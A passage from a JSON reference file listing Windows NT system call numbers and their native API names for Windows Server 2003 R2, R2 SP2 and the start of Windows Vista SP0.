\"NtResetWriteWatch\", \"238\": \"NtRestoreKey\", \"239\": \"NtResumeProcess\", \"240\": \"NtSaveKey\", \"241\": \"NtSaveKeyEx\", \"242\": \"NtSaveMergedKeys\", \"243\": \"NtSecureConnectPort\", \"244\": \"NtSetBootEntryOrder\", \"245\": \"NtSetBootOptions\", \"246\": \"NtSetContextThread\", \"247\": \"NtSetDebugFilterState\", \"248\": \"NtSetDefaultHardErrorPort\", \"249\": \"NtSetDefaultLocale\", \"250\": \"NtSetDefaultUILanguage\", \"251\": \"NtSetDriverEntryOrder\", \"252\": \"NtSetEaFile\", \"253\": \"NtSetHighEventPair\", \"254\": \"NtSetHighWaitLowEventPair\", \"255\": \"NtSetInformationDebugObject\", \"256\": \"NtSetInformationJobObject\", \"257\": \"NtSetInformationKey\", \"258\": \"NtSetInformationToken\", \"259\": \"NtSetIntervalProfile\", \"260\": \"NtSetIoCompletion\", \"261\": \"NtSetLdtEntries\", \"262\": \"NtSetLowEventPair\", \"263\": \"NtSetLowWaitHighEventPair\", \"264\": \"NtSetQuotaInformationFile\", \"265\": \"NtSetSecurityObject\", \"266\": \"NtSetSystemEnvironmentValue\", \"267\": \"NtSetSystemEnvironmentValueEx\", \"268\": \"NtSetSystemInformation\", \"269\": \"NtSetSystemPowerState\", \"270\": \"NtSetSystemTime\", \"271\": \"NtSetThreadExecutionState\", \"272\": \"NtSetTimerResolution\", \"273\": \"NtSetUuidSeed\", \"274\": \"NtSetVolumeInformationFile\", \"275\": \"NtShutdownSystem\", \"276\": \"NtSignalAndWaitForSingleObject\", \"277\": \"NtStartProfile\", \"278\": \"NtStopProfile\", \"279\": \"NtSuspendProcess\", \"280\": \"NtSuspendThread\", \"281\": \"NtSystemDebugControl\", \"282\": \"NtTerminateJobObject\", \"283\": \"NtTestAlert\", \"284\": \"NtTranslateFilePath\", \"285\": \"NtUnloadDriver\", \"286\": \"NtUnloadKey\", \"287\": \"NtUnloadKey2\", \"288\": \"NtUnloadKeyEx\", \"289\": \"NtUnlockFile\", \"290\": \"NtUnlockVirtualMemory\", \"291\": \"NtVdmControl\", \"292\": \"NtWaitForDebugEvent\", \"293\": \"NtWaitForKeyedEvent\", \"294\": \"NtWaitHighEventPair\", \"295\": \"NtWaitLowEventPair\"}, \"R2\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateUserPhysicalPages\", \"109\": \"NtAllocateUuids\", \"110\": \"NtAreMappedFilesTheSame\", \"111\": \"NtAssignProcessToJobObject\", \"112\": \"NtCancelDeviceWakeupRequest\", \"113\": \"NtCompactKeys\", \"114\": \"NtCompareTokens\", \"115\": \"NtCompleteConnectPort\", \"116\": \"NtCompressKey\", \"117\": \"NtConnectPort\", \"118\": \"NtCreateDebugObject\", \"119\": \"NtCreateDirectoryObject\", \"120\": \"NtCreateEventPair\", \"121\": \"NtCreateIoCompletion\", \"122\": \"NtCreateJobObject\", \"123\": \"NtCreateJobSet\", \"124\": \"NtCreateKeyedEvent\", \"125\": \"NtCreateMailslotFile\", \"126\": \"NtCreateMutant\", \"127\": \"NtCreateNamedPipeFile\", \"128\": \"NtCreatePagingFile\", \"129\": \"NtCreatePort\", \"130\": \"NtCreateProcess\", \"131\": \"NtCreateProfile\", \"132\": \"NtCreateSemaphore\", \"133\": \"NtCreateSymbolicLinkObject\", \"134\": \"NtCreateTimer\", \"135\": \"NtCreateToken\", \"136\": \"NtCreateWaitablePort\", \"137\": \"NtDebugActiveProcess\", \"138\": \"NtDebugContinue\", \"139\": \"NtDeleteAtom\", \"140\": \"NtDeleteBootEntry\", \"141\": \"NtDeleteDriverEntry\", \"142\": \"NtDeleteFile\", \"143\": \"NtDeleteKey\", \"144\": \"NtDeleteObjectAuditAlarm\", \"145\": \"NtDeleteValueKey\", \"146\": \"NtDisplayString\", \"147\": \"NtEnumerateBootEntries\", \"148\": \"NtEnumerateDriverEntries\", \"149\": \"NtEnumerateSystemEnvironmentValuesEx\", \"150\": \"NtExtendSection\", \"151\": \"NtFilterToken\", \"152\": \"NtFlushInstructionCache\", \"153\": \"NtFlushKey\", \"154\": \"NtFlushVirtualMemory\", \"155\": \"NtFlushWriteBuffer\", \"156\": \"NtFreeUserPhysicalPages\", \"157\": \"NtGetContextThread\", \"158\": \"NtGetCurrentProcessorNumber\", \"159\": \"NtGetDevicePowerState\", \"160\": \"NtGetPlugPlayEvent\", \"161\": \"NtGetWriteWatch\", \"162\": \"NtImpersonateAnonymousToken\", \"163\": \"NtImpersonateThread\", \"164\": \"NtInitializeRegistry\", \"165\": \"NtInitiatePowerAction\", \"166\": \"NtIsSystemResumeAutomatic\", \"167\": \"NtListenPort\", \"168\": \"NtLoadDriver\", \"169\": \"NtLoadKey\", \"170\": \"NtLoadKey2\", \"171\": \"NtLoadKeyEx\", \"172\": \"NtLockFile\", \"173\": \"NtLockProductActivationKeys\", \"174\": \"NtLockRegistryKey\", \"175\": \"NtLockVirtualMemory\", \"176\": \"NtMakePermanentObject\", \"177\": \"NtMakeTemporaryObject\", \"178\": \"NtMapUserPhysicalPages\", \"179\": \"NtModifyBootEntry\", \"180\": \"NtModifyDriverEntry\", \"181\": \"NtNotifyChangeDirectoryFile\", \"182\": \"NtNotifyChangeKey\", \"183\": \"NtNotifyChangeMultipleKeys\", \"184\": \"NtOpenEventPair\", \"185\": \"NtOpenIoCompletion\", \"186\": \"NtOpenJobObject\", \"187\": \"NtOpenKeyedEvent\", \"188\": \"NtOpenMutant\", \"189\": \"NtOpenObjectAuditAlarm\", \"190\": \"NtOpenProcessToken\", \"191\": \"NtOpenSemaphore\", \"192\": \"NtOpenSymbolicLinkObject\", \"193\": \"NtOpenThread\", \"194\": \"NtOpenTimer\", \"195\": \"NtPlugPlayControl\", \"196\": \"NtPrivilegeCheck\", \"197\": \"NtPrivilegeObjectAuditAlarm\", \"198\": \"NtPrivilegedServiceAuditAlarm\", \"199\": \"NtPulseEvent\", \"200\": \"NtQueryBootEntryOrder\", \"201\": \"NtQueryBootOptions\", \"202\": \"NtQueryDebugFilterState\", \"203\": \"NtQueryDirectoryObject\", \"204\": \"NtQueryDriverEntryOrder\", \"205\": \"NtQueryEaFile\", \"206\": \"NtQueryFullAttributesFile\", \"207\": \"NtQueryInformationAtom\", \"208\": \"NtQueryInformationJobObject\", \"209\": \"NtQueryInformationPort\", \"210\": \"NtQueryInstallUILanguage\", \"211\": \"NtQueryIntervalProfile\", \"212\": \"NtQueryIoCompletion\", \"213\": \"NtQueryMultipleValueKey\", \"214\": \"NtQueryMutant\", \"215\": \"NtQueryOpenSubKeys\", \"216\": \"NtQueryOpenSubKeysEx\", \"217\": \"NtQueryPortInformationProcess\", \"218\": \"NtQueryQuotaInformationFile\", \"219\": \"NtQuerySecurityObject\", \"220\": \"NtQuerySemaphore\", \"221\": \"NtQuerySymbolicLinkObject\", \"222\": \"NtQuerySystemEnvironmentValue\", \"223\": \"NtQuerySystemEnvironmentValueEx\", \"224\": \"NtQueryTimerResolution\", \"225\": \"NtRaiseException\", \"226\": \"NtRaiseHardError\", \"227\": \"NtRegisterThreadTerminatePort\", \"228\": \"NtReleaseKeyedEvent\", \"229\": \"NtRemoveProcessDebug\", \"230\": \"NtRenameKey\", \"231\": \"NtReplaceKey\", \"232\": \"NtReplyWaitReplyPort\", \"233\": \"NtRequestDeviceWakeup\", \"234\": \"NtRequestPort\", \"235\": \"NtRequestWakeupLatency\", \"236\": \"NtResetEvent\", \"237\": \"NtResetWriteWatch\", \"238\": \"NtRestoreKey\", \"239\": \"NtResumeProcess\", \"240\": \"NtSaveKey\", \"241\": \"NtSaveKeyEx\", \"242\": \"NtSaveMergedKeys\", \"243\": \"NtSecureConnectPort\", \"244\": \"NtSetBootEntryOrder\", \"245\": \"NtSetBootOptions\", \"246\": \"NtSetContextThread\", \"247\": \"NtSetDebugFilterState\", \"248\": \"NtSetDefaultHardErrorPort\", \"249\": \"NtSetDefaultLocale\", \"250\": \"NtSetDefaultUILanguage\", \"251\": \"NtSetDriverEntryOrder\", \"252\": \"NtSetEaFile\", \"253\": \"NtSetHighEventPair\", \"254\": \"NtSetHighWaitLowEventPair\", \"255\": \"NtSetInformationDebugObject\", \"256\": \"NtSetInformationJobObject\", \"257\": \"NtSetInformationKey\", \"258\": \"NtSetInformationToken\", \"259\": \"NtSetIntervalProfile\", \"260\": \"NtSetIoCompletion\", \"261\": \"NtSetLdtEntries\", \"262\": \"NtSetLowEventPair\", \"263\": \"NtSetLowWaitHighEventPair\", \"264\": \"NtSetQuotaInformationFile\", \"265\": \"NtSetSecurityObject\", \"266\": \"NtSetSystemEnvironmentValue\", \"267\": \"NtSetSystemEnvironmentValueEx\", \"268\": \"NtSetSystemInformation\", \"269\": \"NtSetSystemPowerState\", \"270\": \"NtSetSystemTime\", \"271\": \"NtSetThreadExecutionState\", \"272\": \"NtSetTimerResolution\", \"273\": \"NtSetUuidSeed\", \"274\": \"NtSetVolumeInformationFile\", \"275\": \"NtShutdownSystem\", \"276\": \"NtSignalAndWaitForSingleObject\", \"277\": \"NtStartProfile\", \"278\": \"NtStopProfile\", \"279\": \"NtSuspendProcess\", \"280\": \"NtSuspendThread\", \"281\": \"NtSystemDebugControl\", \"282\": \"NtTerminateJobObject\", \"283\": \"NtTestAlert\", \"284\": \"NtTranslateFilePath\", \"285\": \"NtUnloadDriver\", \"286\": \"NtUnloadKey\", \"287\": \"NtUnloadKey2\", \"288\": \"NtUnloadKeyEx\", \"289\": \"NtUnlockFile\", \"290\": \"NtUnlockVirtualMemory\", \"291\": \"NtVdmControl\", \"292\": \"NtWaitForDebugEvent\", \"293\": \"NtWaitForKeyedEvent\", \"294\": \"NtWaitHighEventPair\", \"295\": \"NtWaitLowEventPair\"}, \"R2 SP2\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateUserPhysicalPages\", \"109\": \"NtAllocateUuids\", \"110\": \"NtAreMappedFilesTheSame\", \"111\": \"NtAssignProcessToJobObject\", \"112\": \"NtCancelDeviceWakeupRequest\", \"113\": \"NtCompactKeys\", \"114\": \"NtCompareTokens\", \"115\": \"NtCompleteConnectPort\", \"116\": \"NtCompressKey\", \"117\": \"NtConnectPort\", \"118\": \"NtCreateDebugObject\", \"119\": \"NtCreateDirectoryObject\", \"120\": \"NtCreateEventPair\", \"121\": \"NtCreateIoCompletion\", \"122\": \"NtCreateJobObject\", \"123\": \"NtCreateJobSet\", \"124\": \"NtCreateKeyedEvent\", \"125\": \"NtCreateMailslotFile\", \"126\": \"NtCreateMutant\", \"127\": \"NtCreateNamedPipeFile\", \"128\": \"NtCreatePagingFile\", \"129\": \"NtCreatePort\", \"130\": \"NtCreateProcess\", \"131\": \"NtCreateProfile\", \"132\": \"NtCreateSemaphore\", \"133\": \"NtCreateSymbolicLinkObject\", \"134\": \"NtCreateTimer\", \"135\": \"NtCreateToken\", \"136\": \"NtCreateWaitablePort\", \"137\": \"NtDebugActiveProcess\", \"138\": \"NtDebugContinue\", \"139\": \"NtDeleteAtom\", \"140\": \"NtDeleteBootEntry\", \"141\": \"NtDeleteDriverEntry\", \"142\": \"NtDeleteFile\", \"143\": \"NtDeleteKey\", \"144\": \"NtDeleteObjectAuditAlarm\", \"145\": \"NtDeleteValueKey\", \"146\": \"NtDisplayString\", \"147\": \"NtEnumerateBootEntries\", \"148\": \"NtEnumerateDriverEntries\", \"149\": \"NtEnumerateSystemEnvironmentValuesEx\", \"150\": \"NtExtendSection\", \"151\": \"NtFilterToken\", \"152\": \"NtFlushInstructionCache\", \"153\": \"NtFlushKey\", \"154\": \"NtFlushVirtualMemory\", \"155\": \"NtFlushWriteBuffer\", \"156\": \"NtFreeUserPhysicalPages\", \"157\": \"NtGetContextThread\", \"158\": \"NtGetCurrentProcessorNumber\", \"159\": \"NtGetDevicePowerState\", \"160\": \"NtGetPlugPlayEvent\", \"161\": \"NtGetWriteWatch\", \"162\": \"NtImpersonateAnonymousToken\", \"163\": \"NtImpersonateThread\", \"164\": \"NtInitializeRegistry\", \"165\": \"NtInitiatePowerAction\", \"166\": \"NtIsSystemResumeAutomatic\", \"167\": \"NtListenPort\", \"168\": \"NtLoadDriver\", \"169\": \"NtLoadKey\", \"170\": \"NtLoadKey2\", \"171\": \"NtLoadKeyEx\", \"172\": \"NtLockFile\", \"173\": \"NtLockProductActivationKeys\", \"174\": \"NtLockRegistryKey\", \"175\": \"NtLockVirtualMemory\", \"176\": \"NtMakePermanentObject\", \"177\": \"NtMakeTemporaryObject\", \"178\": \"NtMapUserPhysicalPages\", \"179\": \"NtModifyBootEntry\", \"180\": \"NtModifyDriverEntry\", \"181\": \"NtNotifyChangeDirectoryFile\", \"182\": \"NtNotifyChangeKey\", \"183\": \"NtNotifyChangeMultipleKeys\", \"184\": \"NtOpenEventPair\", \"185\": \"NtOpenIoCompletion\", \"186\": \"NtOpenJobObject\", \"187\": \"NtOpenKeyedEvent\", \"188\": \"NtOpenMutant\", \"189\": \"NtOpenObjectAuditAlarm\", \"190\": \"NtOpenProcessToken\", \"191\": \"NtOpenSemaphore\", \"192\": \"NtOpenSymbolicLinkObject\", \"193\": \"NtOpenThread\", \"194\": \"NtOpenTimer\", \"195\": \"NtPlugPlayControl\", \"196\": \"NtPrivilegeCheck\", \"197\": \"NtPrivilegeObjectAuditAlarm\", \"198\": \"NtPrivilegedServiceAuditAlarm\", \"199\": \"NtPulseEvent\", \"200\": \"NtQueryBootEntryOrder\", \"201\": \"NtQueryBootOptions\", \"202\": \"NtQueryDebugFilterState\", \"203\": \"NtQueryDirectoryObject\", \"204\": \"NtQueryDriverEntryOrder\", \"205\": \"NtQueryEaFile\", \"206\": \"NtQueryFullAttributesFile\", \"207\": \"NtQueryInformationAtom\", \"208\": \"NtQueryInformationJobObject\", \"209\": \"NtQueryInformationPort\", \"210\": \"NtQueryInstallUILanguage\", \"211\": \"NtQueryIntervalProfile\", \"212\": \"NtQueryIoCompletion\", \"213\": \"NtQueryMultipleValueKey\", \"214\": \"NtQueryMutant\", \"215\": \"NtQueryOpenSubKeys\", \"216\": \"NtQueryOpenSubKeysEx\", \"217\": \"NtQueryPortInformationProcess\", \"218\": \"NtQueryQuotaInformationFile\", \"219\": \"NtQuerySecurityObject\", \"220\": \"NtQuerySemaphore\", \"221\": \"NtQuerySymbolicLinkObject\", \"222\": \"NtQuerySystemEnvironmentValue\", \"223\": \"NtQuerySystemEnvironmentValueEx\", \"224\": \"NtQueryTimerResolution\", \"225\": \"NtRaiseException\", \"226\": \"NtRaiseHardError\", \"227\": \"NtRegisterThreadTerminatePort\", \"228\": \"NtReleaseKeyedEvent\", \"229\": \"NtRemoveProcessDebug\", \"230\": \"NtRenameKey\", \"231\": \"NtReplaceKey\", \"232\": \"NtReplyWaitReplyPort\", \"233\": \"NtRequestDeviceWakeup\", \"234\": \"NtRequestPort\", \"235\": \"NtRequestWakeupLatency\", \"236\": \"NtResetEvent\", \"237\": \"NtResetWriteWatch\", \"238\": \"NtRestoreKey\", \"239\": \"NtResumeProcess\", \"240\": \"NtSaveKey\", \"241\": \"NtSaveKeyEx\", \"242\": \"NtSaveMergedKeys\", \"243\": \"NtSecureConnectPort\", \"244\": \"NtSetBootEntryOrder\", \"245\": \"NtSetBootOptions\", \"246\": \"NtSetContextThread\", \"247\": \"NtSetDebugFilterState\", \"248\": \"NtSetDefaultHardErrorPort\", \"249\": \"NtSetDefaultLocale\", \"250\": \"NtSetDefaultUILanguage\", \"251\": \"NtSetDriverEntryOrder\", \"252\": \"NtSetEaFile\", \"253\": \"NtSetHighEventPair\", \"254\": \"NtSetHighWaitLowEventPair\", \"255\": \"NtSetInformationDebugObject\", \"256\": \"NtSetInformationJobObject\", \"257\": \"NtSetInformationKey\", \"258\": \"NtSetInformationToken\", \"259\": \"NtSetIntervalProfile\", \"260\": \"NtSetIoCompletion\", \"261\": \"NtSetLdtEntries\", \"262\": \"NtSetLowEventPair\", \"263\": \"NtSetLowWaitHighEventPair\", \"264\": \"NtSetQuotaInformationFile\", \"265\": \"NtSetSecurityObject\", \"266\": \"NtSetSystemEnvironmentValue\", \"267\": \"NtSetSystemEnvironmentValueEx\", \"268\": \"NtSetSystemInformation\", \"269\": \"NtSetSystemPowerState\", \"270\": \"NtSetSystemTime\", \"271\": \"NtSetThreadExecutionState\", \"272\": \"NtSetTimerResolution\", \"273\": \"NtSetUuidSeed\", \"274\": \"NtSetVolumeInformationFile\", \"275\": \"NtShutdownSystem\", \"276\": \"NtSignalAndWaitForSingleObject\", \"277\": \"NtStartProfile\", \"278\": \"NtStopProfile\", \"279\": \"NtSuspendProcess\", \"280\": \"NtSuspendThread\", \"281\": \"NtSystemDebugControl\", \"282\": \"NtTerminateJobObject\", \"283\": \"NtTestAlert\", \"284\": \"NtTranslateFilePath\", \"285\": \"NtUnloadDriver\", \"286\": \"NtUnloadKey\", \"287\": \"NtUnloadKey2\", \"288\": \"NtUnloadKeyEx\", \"289\": \"NtUnlockFile\", \"290\": \"NtUnlockVirtualMemory\", \"291\": \"NtVdmControl\", \"292\": \"NtWaitForDebugEvent\", \"293\": \"NtWaitForKeyedEvent\", \"294\": \"NtWaitHighEventPair\", \"295\": \"NtWaitLowEventPair\"}}, \"Windows Vista\": {\"SP0\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAcquireCMFViewOwnership\", \"103\": \"NtAddBootEntry\", \"104\": \"NtAddDriverEntry\", \"105\": \"NtAdjustGroupsToken\", \"106\": \"NtAlertResumeThread\", \"107\": \"NtAlertThread\", \"108\": \"NtAllocateLocallyUniqueId\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": 